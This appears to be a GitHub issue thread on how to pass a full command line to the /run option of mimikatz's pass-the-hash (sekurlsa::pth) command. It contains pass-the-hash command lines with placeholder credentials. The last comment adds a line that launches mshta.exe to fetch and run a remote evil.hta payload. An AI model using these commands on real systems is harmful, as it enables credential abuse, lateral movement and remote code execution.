PtH: Running a command with parameters about mimikatz HOT 5 CLOSED

Hi Michael,
I think you missed it : https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth
It's the /run:foo
One "not documented yet" argument is /impersonate to affect the new token to the current mimikatz thread :)

from mimikatz.

Thx for your reply. I know about the /run parameter, but I did not know that you can pass the whole command line to it.

But I still have not figured out a way to use it in batch mode, e.g. from BAT or PS1 scripts, which is the way I use mimikatz mostly. This has not worked for me:

mimikatz.exe sekurlsa::pth /user:Administrator /domain:contoso.com /ntlm:ba8098ba09890a80b9a8098b "/run:cmd.exe /c systeminfo" exit

from mimikatz.

it's: /run"foo bar" but arguments problem/escaping is always hard.
On my side a deal with argv[], so it's external to mimikatz to push it in the right way ;)
If I remember well, with PowerShell, you can push arguments in an array.

from mimikatz.

Neither /run"foo bar", nor /run:"foo bar"works for me :-( Powershell is not helpful, either, because the entire command line has to be passed as a single string:
.\mimikatz.exe "sekurlsa::pth /user:$userName /domain:$domain /ntlm:$hash /run:cmd.exe" exit
But nevermind, it is not that important. I just thought there would be a trivial solution.

from mimikatz.

This approach, permits to pass NOT only single string and worked for me:

.\mimikatz.exe
mimikatz # sekurlsa::pth /user:$userName /domain:$domain /ntlm:$hash /run:"mshta.exe http://ip/evil.hta"

from mimikatz.